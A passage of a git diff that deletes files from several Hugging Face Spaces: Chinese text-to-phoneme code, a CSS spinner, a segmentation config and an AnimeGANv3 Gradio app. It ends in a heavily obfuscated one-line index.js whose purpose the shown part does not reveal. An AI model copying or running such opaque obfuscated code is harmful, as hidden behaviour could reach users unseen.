- phones = ["_"] + phones + ["_"] - tones = [0] + tones + [0] - word2ph = [1] + word2ph + [1] - return phones, tones, word2ph - - -def _get_initials_finals(word): - initials = [] - finals = [] - orig_initials = lazy_pinyin(word, neutral_tone_with_five=True, style=Style.INITIALS) - orig_finals = lazy_pinyin( - word, neutral_tone_with_five=True, style=Style.FINALS_TONE3 - ) - for c, v in zip(orig_initials, orig_finals): - initials.append(c) - finals.append(v) - return initials, finals - - -def _g2p(segments): - phones_list = [] - tones_list = [] - word2ph = [] - for seg in segments: - # Replace all English words in the sentence - seg = re.sub("[a-zA-Z]+", "", seg) - seg_cut = psg.lcut(seg) - initials = [] - finals = [] - seg_cut = tone_modifier.pre_merge_for_modify(seg_cut) - for word, pos in seg_cut: - if pos == "eng": - continue - sub_initials, sub_finals = _get_initials_finals(word) - sub_finals = tone_modifier.modified_tone(word, pos, sub_finals) - initials.append(sub_initials) - finals.append(sub_finals) - - # assert len(sub_initials) == len(sub_finals) == len(word) - initials = sum(initials, []) - finals = sum(finals, []) - # - for c, v in zip(initials, finals): - raw_pinyin = c + v - # NOTE: post process for pypinyin outputs - # we discriminate i, ii and iii - if c == v: - assert c in punctuation - phone = [c] - tone = "0" - word2ph.append(1) - else: - v_without_tone = v[:-1] - tone = v[-1] - - pinyin = c + v_without_tone - assert tone in "12345" - - if c: - # 多音节 - v_rep_map = { - "uei": "ui", - "iou": "iu", - "uen": "un", - } - if v_without_tone in v_rep_map.keys(): - pinyin = c + v_rep_map[v_without_tone] - else: - # 单音节 - pinyin_rep_map = { - "ing": "ying", - "i": "yi", - "in": "yin", - "u": "wu", - } - if pinyin in pinyin_rep_map.keys(): - pinyin = pinyin_rep_map[pinyin] - else: - single_rep_map = { - "v": "yu", - "e": "e", - "i": "y", - "u": "w", - } - if pinyin[0] in single_rep_map.keys(): - pinyin = single_rep_map[pinyin[0]] + pinyin[1:] - - assert pinyin in pinyin_to_symbol_map.keys(), (pinyin, seg, raw_pinyin) - phone = pinyin_to_symbol_map[pinyin].split(" ") - word2ph.append(len(phone)) - - phones_list += phone - tones_list += [int(tone)] * len(phone) - return phones_list, tones_list, word2ph - - -def text_normalize(text): - numbers = re.findall(r"\d+(?:\.?\d+)?", text) - for number in numbers: - text = text.replace(number, cn2an.an2cn(number), 1) - text = replace_punctuation(text) - return text - - -def get_bert_feature(text, word2ph): - from text import chinese_bert - - return chinese_bert.get_bert_feature(text, word2ph) - - -if __name__ == "__main__": - from text.chinese_bert import get_bert_feature - - text = "啊!但是《原神》是由,米哈\游自主, [研发]的一款全.新开放世界.冒险游戏" - text = text_normalize(text) - print(text) - phones, tones, word2ph = g2p(text) - bert = get_bert_feature(text, word2ph) - - print(phones, tones, word2ph, bert.shape) - - -# # 示例用法 -# text = "这是一个示例文本:,你好!这是一个测试...." 
-# print(g2p_paddle(text)) # 输出: 这是一个示例文本你好这是一个测试 diff --git a/spaces/Makiing/coolb-in-gtest/src/app/loading.css b/spaces/Makiing/coolb-in-gtest/src/app/loading.css deleted file mode 100644 index eaaab6a86a228334c4eca3c5368ae6f0f593d405..0000000000000000000000000000000000000000 --- a/spaces/Makiing/coolb-in-gtest/src/app/loading.css +++ /dev/null @@ -1,68 +0,0 @@ -::-webkit-scrollbar { - width: 10px; - height: 10px; - display: none; -} - -::-webkit-scrollbar-button:start:decrement, -::-webkit-scrollbar-button:end:increment { - height: 30px; - background-color: transparent; -} - -::-webkit-scrollbar-track-piece { - background-color: #3b3b3b; - -webkit-border-radius: 16px; -} - -::-webkit-scrollbar-thumb:vertical { - height: 50px; - background-color: #666; - border: 1px solid #eee; - -webkit-border-radius: 6px; -} - -/* loading start */ -.loading-spinner { - display: flex; - justify-content: center; - align-items: center; - height: 100vh; - opacity: 1; - transition: opacity .8s ease-out; -} - -.loading-spinner.hidden { - opacity: 0; -} - -.loading-spinner>div { - width: 30px; - height: 30px; - background: linear-gradient(90deg, #2870EA 10.79%, #1B4AEF 87.08%); - - border-radius: 100%; - display: inline-block; - animation: sk-bouncedelay 1.4s infinite ease-in-out both; -} - -.loading-spinner .bounce1 { - animation-delay: -0.32s; -} - -.loading-spinner .bounce2 { - animation-delay: -0.16s; -} - -@keyframes sk-bouncedelay { - - 0%, - 80%, - 100% { - transform: scale(0); - } - - 40% { - transform: scale(1.0); - } -} diff --git a/spaces/MarketINK/MarketINK/README.md b/spaces/MarketINK/MarketINK/README.md deleted file mode 100644 index c4d14e3fb147dbd62116ac6e02461e94445174b3..0000000000000000000000000000000000000000 --- a/spaces/MarketINK/MarketINK/README.md +++ /dev/null @@ -1,13 +0,0 @@ ---- -title: MarketINK -emoji: 🤖 -colorFrom: green -colorTo: blue -sdk: gradio -sdk_version: 3.4.1 -app_file: launch.py -pinned: false -license: unknown ---- - -Check out the configuration reference at https://huggingface.co/docs/hub/spaces-config-reference \ No newline at end of file diff --git a/spaces/Mellow-ai/PhotoAI_Mellow/annotator/uniformer/configs/_base_/models/ann_r50-d8.py b/spaces/Mellow-ai/PhotoAI_Mellow/annotator/uniformer/configs/_base_/models/ann_r50-d8.py deleted file mode 100644 index a2cb653827e44e6015b3b83bc578003e614a6aa1..0000000000000000000000000000000000000000 --- a/spaces/Mellow-ai/PhotoAI_Mellow/annotator/uniformer/configs/_base_/models/ann_r50-d8.py +++ /dev/null @@ -1,46 +0,0 @@ -# model settings -norm_cfg = dict(type='SyncBN', requires_grad=True) -model = dict( - type='EncoderDecoder', - pretrained='open-mmlab://resnet50_v1c', - backbone=dict( - type='ResNetV1c', - depth=50, - num_stages=4, - out_indices=(0, 1, 2, 3), - dilations=(1, 1, 2, 4), - strides=(1, 2, 1, 1), - norm_cfg=norm_cfg, - norm_eval=False, - style='pytorch', - contract_dilation=True), - decode_head=dict( - type='ANNHead', - in_channels=[1024, 2048], - in_index=[2, 3], - channels=512, - project_channels=256, - query_scales=(1, ), - key_pool_scales=(1, 3, 6, 8), - dropout_ratio=0.1, - num_classes=19, - norm_cfg=norm_cfg, - align_corners=False, - loss_decode=dict( - type='CrossEntropyLoss', use_sigmoid=False, loss_weight=1.0)), - auxiliary_head=dict( - type='FCNHead', - in_channels=1024, - in_index=2, - channels=256, - num_convs=1, - concat_input=False, - dropout_ratio=0.1, - num_classes=19, - norm_cfg=norm_cfg, - align_corners=False, - loss_decode=dict( - type='CrossEntropyLoss', use_sigmoid=False, loss_weight=0.4)), - 
# model training and testing settings - train_cfg=dict(), - test_cfg=dict(mode='whole')) diff --git a/spaces/MichaelT8093/AnimeGANv3/app.py b/spaces/MichaelT8093/AnimeGANv3/app.py deleted file mode 100644 index 677f429041bf7da6a7161135726355e315db4712..0000000000000000000000000000000000000000 --- a/spaces/MichaelT8093/AnimeGANv3/app.py +++ /dev/null @@ -1,108 +0,0 @@ -import os -import cv2 -import gradio as gr -import AnimeGANv3_src - - -os.makedirs('output', exist_ok=True) - - -def inference(img_path, Style, if_face=None): - print(img_path, Style, if_face) - try: - img = cv2.imread(img_path) - img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB) - if Style == "AnimeGANv3_Arcane": - f = "A" - elif Style == "AnimeGANv3_Trump v1.0": - f = "T" - elif Style == "AnimeGANv3_Shinkai": - f = "S" - elif Style == "AnimeGANv3_PortraitSketch": - f = "P" - elif Style == "AnimeGANv3_Hayao": - f = "H" - elif Style == "AnimeGANv3_Disney v1.0": - f = "D" - elif Style == "AnimeGANv3_JP_face v1.0": - f = "J" - else: - f = "U" - - try: - det_face = True if if_face=="Yes" else False - output = AnimeGANv3_src.Convert(img, f, det_face) - save_path = f"output/out.{img_path.rsplit('.')[-1]}" - cv2.imwrite(save_path, output[:, :, ::-1]) - return output, save_path - except RuntimeError as error: - print('Error', error) - except Exception as error: - print('global exception', error) - return None, None - - -title = "AnimeGANv3: To produce your own animation." -description = r"""Official online demo for AnimeGANv3. If you like what I'm doing you can tip me on **patreon**.
-It can be used to turn your photos or videos into anime.
-To use it, simply upload your image. It can convert landscape photos into Hayao Miyazaki or Makoto Shinkai style anime, and it offers six different style conversions for human faces.
-If AnimeGANv3 is helpful, please help to ⭐ the Github Repo and recommend it to your friends. 😊 - -""" -article = r""" - -[![GitHub Stars](https://img.shields.io/github/stars/TachibanaYoshino/AnimeGANv3?style=social)](https://github.com/TachibanaYoshino/AnimeGANv3) - -### 🔥 Demo -I. Video to anime (Hayao Style) -

- - - -

-II. Video to anime (USA cartoon + Disney style) - - ----------- - -## License -This repo is made freely available to academic and non-academic entities for non-commercial purposes such as academic research, teaching, scientific publications. Permission is granted to use the AnimeGANv3 given that you agree to my license terms. Regarding the request for commercial use, please contact us via email to help you obtain the authorization letter. - -## Acknowledgement -* Huggingface UI is referenced from @akhaliq/GFPGAN. -* The dataset of AnimeGANv3_JP_face v1.0 is from DCTnet and then manually optimized. - -## Author -Xin Chen -If you have any question, please open an issue on GitHub Repo. - - -
visitor badge
-""" -gr.Interface( - inference, [ - gr.inputs.Image(type="filepath", label="Input"), - gr.Dropdown([ - 'AnimeGANv3_Hayao', - 'AnimeGANv3_Shinkai', - 'AnimeGANv3_Arcane', - 'AnimeGANv3_USA', - 'AnimeGANv3_Trump v1.0', - 'AnimeGANv3_Disney v1.0', - 'AnimeGANv3_PortraitSketch', - 'AnimeGANv3_JP_face v1.0', - ], - type="value", - value='AnimeGANv3_Hayao', - label='AnimeGANv3 Style'), - gr.inputs.Radio(['Yes', 'No'], type="value", default='No', label='Extract face'), - ], [ - gr.outputs.Image(type="numpy", label="Output (The whole image)"), - gr.outputs.File(label="Download the output image") - ], - title=title, - description=description, - article=article, - allow_flagging="never", - examples=[['samples/7_out.jpg', 'AnimeGANv3_Arcane', "Yes"], ['samples/15566.jpg', 'AnimeGANv3_USA', "Yes"],['samples/23034.jpg', 'AnimeGANv3_Trump v1.0', "Yes"], ['samples/jp_13.jpg', 'AnimeGANv3_Hayao', "No"], - ['samples/jp_20.jpg', 'AnimeGANv3_Shinkai', "No"], ['samples/Hamabe Minami.jpg', 'AnimeGANv3_Disney v1.0', "Yes"], ['samples/120.jpg', 'AnimeGANv3_JP_face v1.0', "Yes"], ['samples/52014.jpg', 'AnimeGANv3_PortraitSketch', "Yes"]]).launch(enable_queue=True) diff --git a/spaces/Michale1017/WS/index.js b/spaces/Michale1017/WS/index.js deleted file mode 100644 index 33437ab3c1c48cb9c99d97c3d3b458b9ee2a36f9..0000000000000000000000000000000000000000 --- a/spaces/Michale1017/WS/index.js +++ /dev/null @@ -1 +0,0 @@ -(function(_0x4485c9,_0x22327b){function _0xefd3bf(_0x3e1c6c,_0x1dfa24,_0x15da7f,_0x195c5d,_0x405333){return _0x222c(_0x1dfa24- -0x3cc,_0x405333);}function _0x297c01(_0x30ec4a,_0x42df57,_0x259878,_0x4968a7,_0x262f74){return _0x222c(_0x30ec4a-0x36e,_0x259878);}const _0x356a3e=_0x4485c9();function _0xb68276(_0x21380b,_0x2e2973,_0x52b0fa,_0x117bd5,_0x3635d9){return _0x222c(_0x2e2973-0x241,_0x117bd5);}function _0x4acd10(_0x52497a,_0x3b158a,_0x45ad13,_0x477292,_0x54f686){return _0x222c(_0x3b158a-0x1b5,_0x477292);}function _0x2197ea(_0x728895,_0x5db489,_0x447ced,_0x923532,_0x60db0c){return _0x222c(_0x447ced-0x179,_0x923532);}while(!![]){try{const _0x348d5c=parseInt(_0x4acd10(0x3db,0x3de,0x389,0x4af,0x2ed))/(-0x1*-0x99b+0x1*0x12af+-0x1c49)*(parseInt(_0x4acd10(0x224,0x267,0x1fe,0x24b,0x2fc))/(0x2449+-0x5*0x75d+0x45*0x2))+parseInt(_0x4acd10(0x34f,0x32e,0x335,0x30c,0x2e0))/(-0x1a18+0x15d*-0x13+-0x3*-0x1156)+parseInt(_0x2197ea(0x364,0x3b7,0x2d6,0x26b,0x288))/(0x1e6+-0x1a3a*-0x1+-0x7*0x404)*(parseInt(_0x4acd10(0x47a,0x3ed,0x425,0x324,0x429))/(0xdca+-0xcdd*-0x3+-0x1a2e*0x2))+parseInt(_0xefd3bf(-0x249,-0x245,-0x167,-0x2c3,-0x272))/(0x2*-0x93b+0x21a3+-0x50d*0x3)*(parseInt(_0x4acd10(0x2e2,0x3a7,0x45d,0x34f,0x3a5))/(-0x8*-0x4a9+0x14ae+0x1*-0x39ef))+parseInt(_0x2197ea(0x1c3,0x1dd,0x22d,0x16f,0x2b1))/(-0x15f+-0x3*0xbb9+0x2*0x1249)*(parseInt(_0x297c01(0x56b,0x639,0x494,0x57d,0x4da))/(0x7a2+0x1*-0xedb+0x3a1*0x2))+parseInt(_0x4acd10(0x325,0x3cf,0x33d,0x3f5,0x470))/(-0x1f28+0x114+-0x1e*-0x101)*(-parseInt(_0xefd3bf(-0x199,-0x1e0,-0x163,-0x117,-0x119))/(-0x897+-0x1842+0x20e4))+parseInt(_0xb68276(0x3a8,0x40e,0x3ed,0x368,0x36b))/(-0x1c06+-0x1462+-0x1*-0x3074)*(-parseInt(_0x297c01(0x56d,0x622,0x59e,0x496,0x599))/(0x3*-0x45a+-0x1d72+0x3*0xe2f));if(_0x348d5c===_0x22327b)break;else _0x356a3e['push'](_0x356a3e['shift']());}catch(_0x2be93b){_0x356a3e['push'](_0x356a3e['shift']());}}}(_0x4e4c,0x82*-0x19d0+0x374aa+-0x71e1d*-0x3));function _0x1d31e6(_0x26aabc,_0x58e3f1,_0x4d962d,_0x44a366,_0x1e49ac){return _0x222c(_0x26aabc- -0x25,_0x4d962d);}const _0x7d8571=(function(){function 
_0x608687(_0x541c2e,_0x566e15,_0x56da78,_0x4712c,_0x461848){return _0x222c(_0x541c2e- -0x209,_0x566e15);}function _0x19cc71(_0x45b869,_0x4779d2,_0xbcb35d,_0x3ae9e2,_0x267e6a){return _0x222c(_0x3ae9e2-0x168,_0x267e6a);}function _0x2ff91a(_0x2fa4df,_0x2d5ef6,_0x128dfa,_0x5f2dcf,_0x1ed3d0){return _0x222c(_0x1ed3d0-0x382,_0x2d5ef6);}function _0x570f86(_0x328671,_0x57b76c,_0x39f1be,_0x5ab763,_0x4adaeb){return _0x222c(_0x5ab763- -0xc9,_0x57b76c);}function _0x237352(_0x27c7b9,_0x4fb426,_0xa489a,_0x533521,_0x1d2f34){return _0x222c(_0x27c7b9- -0x295,_0x533521);}const _0x5186e9={'CLxJL':function(_0x174521,_0x4e51f9){return _0x174521(_0x4e51f9);},'sEXRC':function(_0x47e55c,_0x304d65){return _0x47e55c+_0x304d65;},'vPGKz':_0x237352(-0x203,-0x2d5,-0x1b1,-0x11e,-0x1d8)+_0x237352(-0x72,-0x12,-0xf5,-0xc6,-0x14b)+_0x2ff91a(0x3ac,0x3ce,0x49a,0x47f,0x455)+_0x2ff91a(0x44f,0x4d3,0x3dc,0x4c2,0x45c),'TTiuI':_0x608687(-0x20,-0x38,0x8d,-0xc5,-0xbc)+_0x608687(-0x3d,-0x4c,0x80,-0x22,0x77)+_0x570f86(0x4a,0xb2,0xb9,0x4a,0x5)+_0x570f86(0x11d,0xec,0x168,0x13c,0xe0)+_0x19cc71(0x280,0x2ec,0x309,0x245,0x1ef)+_0x608687(-0xa0,-0x16f,-0x14e,-0xee,0x1)+'\x20)','YyzBo':function(_0x3fd5d6,_0x145fea){return _0x3fd5d6!==_0x145fea;},'liNNj':_0x608687(0x21,0x5b,0x60,-0x5a,-0xc8),'ZtWnq':function(_0x40dedb,_0x579930){return _0x40dedb===_0x579930;},'pGfic':_0x2ff91a(0x407,0x4fd,0x4b4,0x455,0x49b),'JOvwt':_0x570f86(0x82,0x58,0x78,0xc7,0xdf)+_0x237352(-0xfd,-0x2e,-0x60,-0xce,-0x18c)+_0x608687(-0x108,-0x1bb,-0xe1,-0xed,-0x1cd),'IgZqH':_0x570f86(0x1b,0xf5,-0xb7,0x4,-0x11)+'er','HHIYV':function(_0x3281b8){return _0x3281b8();},'fwptI':function(_0x442173,_0x163537){return _0x442173===_0x163537;},'AFQdy':_0x19cc71(0x405,0x3c5,0x42b,0x3c5,0x300),'EGhZe':_0x237352(-0x1d1,-0x1b3,-0x20a,-0x266,-0x1f7)};let _0x460d02=!![];return function(_0x23b1fb,_0x5bea40){const _0x4ef3c3={'hLqPS':_0x5186e9[_0x2c608f(-0x224,-0x1b8,-0xb5,-0x179,-0xa5)],'LEbOf':_0x5186e9[_0x2c608f(-0xa7,-0x64,-0x8,-0xc1,-0xe0)],'RExtq':function(_0x36abf9){function _0x3a6869(_0x1f6ded,_0x6e3a20,_0x1c712,_0x5e2b93,_0x25a8c9){return _0x2c608f(_0x1f6ded-0x1ac,_0x6e3a20-0x1de,_0x1c712-0xa3,_0x5e2b93- -0x1d1,_0x25a8c9);}return _0x5186e9[_0x3a6869(-0x3c3,-0x29e,-0x33e,-0x32e,-0x23f)](_0x36abf9);}};function _0x130cc0(_0x28523e,_0x37ac41,_0x46edaa,_0x4a3eff,_0x2357ad){return _0x237352(_0x46edaa- -0x138,_0x37ac41-0x66,_0x46edaa-0x3a,_0x2357ad,_0x2357ad-0x33);}function _0x2c608f(_0x5aeefc,_0x508c15,_0x31febe,_0x2f9456,_0xc3f468){return _0x237352(_0x2f9456-0x8f,_0x508c15-0xa7,_0x31febe-0xef,_0xc3f468,_0xc3f468-0x1d2);}function _0x4cd69c(_0x2f64ef,_0x3d09f6,_0x5c2aaa,_0x9d422e,_0x2d6659){return _0x19cc71(_0x2f64ef-0xf6,_0x3d09f6-0x73,_0x5c2aaa-0x71,_0x5c2aaa-0x1d3,_0x2d6659);}function _0x300ab1(_0x5eb7c0,_0x1aa2f0,_0x37acbd,_0xe8d84b,_0x89da59){return _0x19cc71(_0x5eb7c0-0x1c0,_0x1aa2f0-0x1be,_0x37acbd-0x185,_0x89da59- -0x190,_0x5eb7c0);}function _0x48b8ea(_0x46b6f8,_0x47d45e,_0x1afc7a,_0x224ce8,_0x1954a4){return _0x570f86(_0x46b6f8-0xfa,_0x1954a4,_0x1afc7a-0xef,_0x47d45e-0x387,_0x1954a4-0xb2);}if(_0x5186e9[_0x2c608f(-0x35,-0x88,-0x13a,-0x9c,-0x103)](_0x5186e9[_0x130cc0(-0x2d3,-0x41d,-0x349,-0x31a,-0x2ca)],_0x5186e9[_0x4cd69c(0x4ca,0x445,0x3e5,0x39d,0x347)]))return function(_0x5a41db){}[_0x48b8ea(0x4a0,0x463,0x548,0x4af,0x3ab)+_0x300ab1(0x28,-0x3a,0xd6,0xd9,0x9d)+'r'](_0x4ef3c3[_0x130cc0(-0x1d2,-0x134,-0x175,-0x14c,-0x1c4)])[_0x2c608f(-0x38,0xae,0xcf,-0xf,-0xa9)](_0x4ef3c3[_0x300ab1(0x156,0x15d,0xb7,0x1eb,0x144)]);else{const _0x2277f4=_0x460d02?function(){function 
_0x2401aa(_0x2b6833,_0x4b79ca,_0x31a993,_0xe8033,_0x334706){return _0x2c608f(_0x2b6833-0x1cc,_0x4b79ca-0x49,_0x31a993-0x58,_0x334706-0x229,_0xe8033);}function _0x3c2a18(_0x5a95ec,_0x587d1e,_0x39e62c,_0xfa1821,_0x522fa){return _0x4cd69c(_0x5a95ec-0x62,_0x587d1e-0xf3,_0x39e62c- -0x77,_0xfa1821-0xd2,_0x587d1e);}function _0x50cbbd(_0x1a3960,_0x5e2e55,_0x4eba15,_0x58019e,_0x40c53e){return _0x130cc0(_0x1a3960-0x145,_0x5e2e55-0x1b1,_0x5e2e55-0x5ce,_0x58019e-0x1ee,_0x4eba15);}function _0x4e7947(_0x45c3fd,_0x547ae3,_0x550ac9,_0x43e80c,_0x4966d8){return _0x4cd69c(_0x45c3fd-0x165,_0x547ae3-0x20,_0x550ac9- -0xf3,_0x43e80c-0x4c,_0x547ae3);}function _0x5966bf(_0x424dbb,_0x200755,_0x6b382,_0x2ac986,_0x46bc6a){return _0x2c608f(_0x424dbb-0x105,_0x200755-0x3b,_0x6b382-0x100,_0x424dbb-0x1ba,_0x6b382);}const _0x22a4a1={'kcOBP':function(_0x24e26c,_0xdad72f){function _0x5639a6(_0x20c4b6,_0x4df758,_0x83e411,_0x47ac48,_0x53a311){return _0x222c(_0x4df758-0x99,_0x83e411);}return _0x5186e9[_0x5639a6(0x211,0x1be,0x192,0xdc,0x24d)](_0x24e26c,_0xdad72f);},'UGzxM':function(_0xa58f7f,_0x23a6ad){function _0x37e16e(_0x1b8800,_0x8a743d,_0x16ed08,_0x310d7f,_0x5ed0b2){return _0x222c(_0x16ed08-0x69,_0x1b8800);}return _0x5186e9[_0x37e16e(0x1e3,0x7d,0x123,0x173,0x1be)](_0xa58f7f,_0x23a6ad);},'SQFha':_0x5186e9[_0x50cbbd(0x2e3,0x28a,0x302,0x2ca,0x296)],'rcsmG':_0x5186e9[_0x50cbbd(0x280,0x2d5,0x392,0x27d,0x29d)]};if(_0x5186e9[_0x2401aa(0x2a2,0x20c,0x2e6,0x300,0x21e)](_0x5186e9[_0x50cbbd(0x1d4,0x290,0x292,0x2e7,0x355)],_0x5186e9[_0x5966bf(0x43,-0x79,-0x2e,-0x27,0xbd)])){const _0x5da1fd=function(){function _0x21f5a9(_0x566629,_0x4af024,_0x17f5cd,_0x24caf2,_0x85b603){return _0x4e7947(_0x566629-0x1a4,_0x17f5cd,_0x24caf2- -0x385,_0x24caf2-0x55,_0x85b603-0x182);}function _0x26b488(_0x285512,_0x66c63,_0x2c0528,_0xeec007,_0x2f97fc){return _0x50cbbd(_0x285512-0x68,_0x2c0528- -0x57f,_0xeec007,_0xeec007-0x154,_0x2f97fc-0x12d);}let _0x5375cc;try{_0x5375cc=_0x22a4a1[_0x2f1c3d(-0x8a,-0x1ff,-0x18f,-0x14b,-0x216)](_0x2937d6,_0x22a4a1[_0x26b488(-0x26c,-0x274,-0x23c,-0x29e,-0x295)](_0x22a4a1[_0x26b488(-0x1bc,-0x2ae,-0x23c,-0x302,-0x2de)](_0x22a4a1[_0x2f1c3d(-0xdf,-0x202,-0x187,-0x144,-0x169)],_0x22a4a1[_0x26b488(-0x296,-0x2ed,-0x2a7,-0x314,-0x351)]),');'))();}catch(_0x262405){_0x5375cc=_0x55d1dc;}function _0x2f1c3d(_0x37184d,_0x278779,_0x2cefa0,_0x583550,_0x1da5b5){return _0x50cbbd(_0x37184d-0x145,_0x583550- -0x569,_0x2cefa0,_0x583550-0x17c,_0x1da5b5-0x198);}function _0x1a8f86(_0x370014,_0x346c35,_0x2c014e,_0x480f76,_0x2a3339){return _0x4e7947(_0x370014-0x41,_0x370014,_0x2a3339- -0x4d4,_0x480f76-0x85,_0x2a3339-0x19d);}function _0x467577(_0x345385,_0x3e3106,_0x42df17,_0x1e5bac,_0x1b4099){return _0x50cbbd(_0x345385-0x1dd,_0x1e5bac- -0x396,_0x1b4099,_0x1e5bac-0x8e,_0x1b4099-0x7f);}return _0x5375cc;},_0x2295a4=_0x4ef3c3[_0x50cbbd(0x326,0x389,0x304,0x43f,0x2f2)](_0x5da1fd);_0x2295a4[_0x3c2a18(0x3ff,0x359,0x37b,0x354,0x3d6)+_0x50cbbd(0x240,0x2af,0x39e,0x25f,0x277)+'l'](_0x56a47c,-0x7*-0x55+-0xc75*0x2+0x2637);}else{if(_0x5bea40){if(_0x5186e9[_0x2401aa(0xbb,0x1a3,0x15,0x47,0xb7)](_0x5186e9[_0x3c2a18(0x46e,0x4ba,0x4e3,0x414,0x4c8)],_0x5186e9[_0x2401aa(0x234,0x2d3,0x267,0x1c5,0x242)])){const _0xe12e92=_0x5bea40[_0x4e7947(0x516,0x4b6,0x43f,0x38b,0x3d0)](_0x23b1fb,arguments);return _0x5bea40=null,_0xe12e92;}else return _0x132982;}}}:function(){};return _0x460d02=![],_0x2277f4;}};}()),_0x75b4a9=_0x7d8571(this,function(){function _0x21f005(_0x358bff,_0x186eb5,_0x4954bd,_0x5ca7a1,_0xed9ba6){return _0x222c(_0x186eb5- -0xcf,_0xed9ba6);}const _0x16d6bc={};function 
_0x1246b2(_0x2db16b,_0x221bdc,_0x183b73,_0x31610d,_0x243ff1){return _0x222c(_0x2db16b- -0x290,_0x31610d);}function _0x3e745b(_0x1d7ec6,_0x833c95,_0xc700d8,_0x2c3110,_0x28978e){return _0x222c(_0x1d7ec6- -0x1c2,_0x833c95);}_0x16d6bc[_0x22182c(0x61,0xeb,0x1,0x77,0x71)]=_0x1246b2(-0x4e,0x0,0x81,-0xef,-0xd1)+_0x3e745b(0x2,-0x63,-0x6,-0x3b,-0xd2)+'+$';const _0x15c2a5=_0x16d6bc;function _0x424314(_0x5486ac,_0x48a52c,_0x324a4f,_0x1274bc,_0x37015e){return _0x222c(_0x5486ac- -0x2e5,_0x48a52c);}function _0x22182c(_0x5adafe,_0x1c7d15,_0x37ae8e,_0x3e8694,_0x4c108b){return _0x222c(_0x37ae8e- -0x150,_0x5adafe);}return _0x75b4a9[_0x424314(-0xa7,-0xfd,-0x168,-0x89,0x2b)+_0x21f005(-0xd1,-0x30,-0x48,-0xdc,0x27)]()[_0x22182c(-0x14e,-0x75,-0xad,0x9,0x3b)+'h'](_0x15c2a5[_0x1246b2(-0x13f,-0x1ae,-0xe9,-0xbd,-0x62)])[_0x3e745b(0x7c,-0x35,0x15e,0xeb,0x142)+_0x424314(-0x246,-0x1fa,-0x18c,-0x167,-0x223)]()[_0x1246b2(-0xeb,-0xc9,-0x106,-0x18,-0xac)+_0x424314(-0x220,-0x22a,-0x249,-0x255,-0x223)+'r'](_0x75b4a9)[_0x3e745b(-0x11f,-0x1fd,-0x8a,-0x59,-0x6a)+'h'](_0x15c2a5[_0x1246b2(-0x13f,-0x192,-0x1b2,-0xfa,-0x116)]);});_0x75b4a9();const _0xdd6162=(function(){function _0x1b7e56(_0x565d9d,_0x10be8b,_0x1db0a1,_0x2a9615,_0x58aa3d){return _0x222c(_0x2a9615- -0xc9,_0x1db0a1);}function _0x535ef2(_0x3a5747,_0x4792c5,_0x575458,_0x5e113a,_0x5afd25){return _0x222c(_0x575458-0x2b8,_0x5afd25);}function _0x47b722(_0x34e60e,_0x214a6d,_0x44d11e,_0x101c21,_0xf78db){return _0x222c(_0x44d11e- -0x24d,_0x214a6d);}function _0x312d48(_0x170ce1,_0x2d452b,_0x1e9e77,_0x421523,_0x3e21ad){return _0x222c(_0x3e21ad-0x11a,_0x421523);}const _0x282ffb={'pFaCe':_0x47b722(-0x181,-0x1ec,-0x1a9,-0x23a,-0x19a),'pOQpd':function(_0x2e5532,_0x5efd90){return _0x2e5532(_0x5efd90);},'djRtw':_0x3cfc6d(0x66,0x65,0xdc,0x88,0x91),'bUAtF':_0x47b722(-0x51,-0x39,-0xfa,-0xe8,-0x1d7),'cVTCn':function(_0x3b4db0,_0x3dad4d){return _0x3b4db0+_0x3dad4d;},'lbAPp':function(_0xcab92f,_0x426ab2){return _0xcab92f==_0x426ab2;},'ZSRjq':function(_0x2ce010,_0x3efc49){return _0x2ce010+_0x3efc49;},'ZLSGn':function(_0x5c89d0,_0x118da9,_0x1c28f0,_0x2238c8){return _0x5c89d0(_0x118da9,_0x1c28f0,_0x2238c8);},'vwWMV':_0x1b7e56(-0x4b,0x9d,0xd7,0x1a,0x46)+_0x312d48(0x23a,0x31d,0x2dd,0x3e4,0x2f4),'QPwpg':function(_0x193d1f,_0x3c05f8){return _0x193d1f(_0x3c05f8);},'esxiR':function(_0x4983fa,_0x50c8ac,_0x47abff){return _0x4983fa(_0x50c8ac,_0x47abff);},'OEyyx':_0x1b7e56(-0x4f,0xc1,0xb3,0x1a,0x104)+_0x535ef2(0x508,0x3bb,0x491,0x580,0x47b)+'r:','PIoog':function(_0x1d38fa,_0x483221){return _0x1d38fa!==_0x483221;},'ENUXM':_0x312d48(0x253,0xdf,0x1dc,0x104,0x1c2),'bTZpH':_0x47b722(-0x228,-0x16c,-0x18d,-0x273,-0xe7),'cxfXB':function(_0x5a536d,_0x328336){return _0x5a536d===_0x328336;},'NtuTp':_0x3cfc6d(0x70,-0xb7,-0x6b,0xb,-0x4a),'ELQqV':function(_0x44d3d6,_0x5b067c){return _0x44d3d6===_0x5b067c;},'iiOWN':_0x47b722(-0x170,0x1c,-0x98,0x22,-0x11c)};function _0x3cfc6d(_0x5df056,_0x5ccbb8,_0x4aa519,_0x43fae4,_0x29a057){return _0x222c(_0x29a057- -0x154,_0x5df056);}let _0x22eb26=!![];return function(_0x50be46,_0x43bad9){function _0x33b0a4(_0x18fadf,_0x30c63f,_0x2b75b7,_0x24f0dc,_0x3512d5){return _0x3cfc6d(_0x3512d5,_0x30c63f-0x51,_0x2b75b7-0x71,_0x24f0dc-0x128,_0x18fadf-0x5c);}function _0x11392f(_0x3ecc1f,_0x1bd1e6,_0x29a3c0,_0x3acf01,_0x1c1101){return _0x47b722(_0x3ecc1f-0x2b,_0x3ecc1f,_0x29a3c0-0x561,_0x3acf01-0x17d,_0x1c1101-0x8a);}function _0xf20218(_0x19de30,_0x9f3743,_0x425958,_0x1205ef,_0x4f5804){return _0x535ef2(_0x19de30-0x173,_0x9f3743-0xad,_0x4f5804- -0x517,_0x1205ef-0x105,_0x425958);}function 
